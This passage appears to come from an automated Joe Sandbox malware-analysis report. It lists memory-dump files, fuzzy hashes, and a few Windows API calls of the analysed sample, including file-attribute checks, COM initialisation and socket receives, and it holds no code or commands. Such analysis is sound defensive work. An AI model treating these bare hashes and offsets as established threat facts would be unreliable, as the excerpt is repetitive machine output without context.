                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a96cecf8be6c07e20b9404f7e7678b72c27a82b080bc1088f635042c0013ea61
                                                                                                                                                                                                                                                                                          • Instruction ID: e89476a5e2c2390d292440815fee279cedd9f89a5f6a66c69bf26110b7a55055
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a96cecf8be6c07e20b9404f7e7678b72c27a82b080bc1088f635042c0013ea61
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27C08C2C03160009FD1C493811B49AC734A4A477E83F41B84E5704B1E1CA39682BA250
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,0024DA1D,?,?,?,?), ref: 002487B9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 36e3068f7a555a787ace1512e903c08d46e50d121c18f4137519a0e0898dadcd
                                                                                                                                                                                                                                                                                          • Instruction ID: 9b71f0cdaa9a09b2d5b72442fb1bae0d810763f13cfab22f621cdea5cc897948
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e3068f7a555a787ace1512e903c08d46e50d121c18f4137519a0e0898dadcd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14C08C3C0312004AFA1C8E3861B492C720A9A0376C3F00B88E5314B1E1CB36D427C6A0
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0024B3C7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351255484.0000000000435000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351269485.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351286372.0000000000442000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351304627.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351323793.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351339302.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351353457.0000000000466000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351377245.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351406927.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351433599.0000000000491000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351459139.0000000000492000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351477745.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351494555.0000000000497000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351517076.000000000049B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351542482.00000000004AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351561593.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351583475.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351600385.00000000004BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351616529.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351635171.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351652841.00000000004C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351668555.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351692992.00000000004DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351710042.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351759162.0000000000534000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351778581.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351807859.0000000000536000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351830154.000000000053A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351847947.000000000053D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351866645.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351884527.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_240000_file.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8387cc961a8e125c0c4c1399c8e61a08a5ba51edb794beacf869494f30abd0fa
                                                                                                                                                                                                                                                                                          • Instruction ID: ed4a1eb093c83a312268ca79dd14a2eac88b8afd108f0577c94c60f296078b55
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8387cc961a8e125c0c4c1399c8e61a08a5ba51edb794beacf869494f30abd0fa
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7B11870A10268DFEB29CF18CD94BDEB7B5EF19304F9041D9E80967281D775AA98CF90
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0bdd75a555e251e4b212b73a59c983f7bd64c17a637c07db90d58671bab8006f
                                                                                                                                                                                                                                                                                          • Instruction ID: a1f47f9b2849080d20cc9ab4f0ec707eab8730178cae6247e9f1b3aa96fc88ed
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bdd75a555e251e4b212b73a59c983f7bd64c17a637c07db90d58671bab8006f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF08CBB34C311EEA2B0D5A96E546B773BAFA95330730C82AF04BC2101F2157949A231
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 09e4deb281837dc256e6006056c57d40ea41071c99f44e75354e88a53bebe547
                                                                                                                                                                                                                                                                                          • Instruction ID: a7a15c2448aaadceb56d64053ddff0f30ffd874a781485b71eb63e2bcf369db9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09e4deb281837dc256e6006056c57d40ea41071c99f44e75354e88a53bebe547
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E0CDF734C201FE51B05955AD4567377B6FB557303348946F04FC6501F2253945B221
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d423927a78bc5065c90ae73032faf8c3bc16250956bfa45d8d373c1dbac07861
                                                                                                                                                                                                                                                                                          • Instruction ID: 8a4fb915028d85967f06054340eee317cd9656adaf51b416a9366e1320201c1a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d423927a78bc5065c90ae73032faf8c3bc16250956bfa45d8d373c1dbac07861
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5E026FB30C600DB91B11161AC1A3F3773AAB247347148941A48BC7241B2693595A112
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 6513db63177e9147ade87e1ea77596ea9ea94f50fd30c12a2acf059ebd5c012e
                                                                                                                                                                                                                                                                                          • Instruction ID: 4110f50cf2e1cb144d4cd4441670af8ccdae2d010fe51edf8f8756358d72969e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6513db63177e9147ade87e1ea77596ea9ea94f50fd30c12a2acf059ebd5c012e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E026F730C201FD41B04E15AE045733776BB247303388942E08BC6100F3257991B761
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: dd44a1bcf51c4f6be01617c7a8cee2608cffba2d7b30ee93a44452284772c5b0
                                                                                                                                                                                                                                                                                          • Instruction ID: 7dd3e434cfb50a5651dd8bc85c1f14cabc8591b75bce5a5881e9d864b7bfe143
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd44a1bcf51c4f6be01617c7a8cee2608cffba2d7b30ee93a44452284772c5b0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58D02BB774C314E802E121F50D0A3B3BA7B7A1A2303254452B44BD5551B20A26947162
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354013479.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4a70000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 40f71558d385d7cfbe71523334f2411224105f7ce429289755d5d126bc21afc9
                                                                                                                                                                                                                                                                                          • Instruction ID: 2bd1139be8ca7922403eaeaf49ff4b18ed0f2724cbad5068af9e98f2c57101d6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40f71558d385d7cfbe71523334f2411224105f7ce429289755d5d126bc21afc9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21D0A7BB74C310D941F114551D416B37677BB12330314C581908BD6641B3693664B556
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 0024E10B
                                                                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 0024E140
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1350854966.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350828872.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350854966.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350944262.00000000002A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350964620.00000000002AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1350983718.00000000002B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351021597.00000000002B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351044027.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351161829.000000000040F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351182850.0000000000412000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
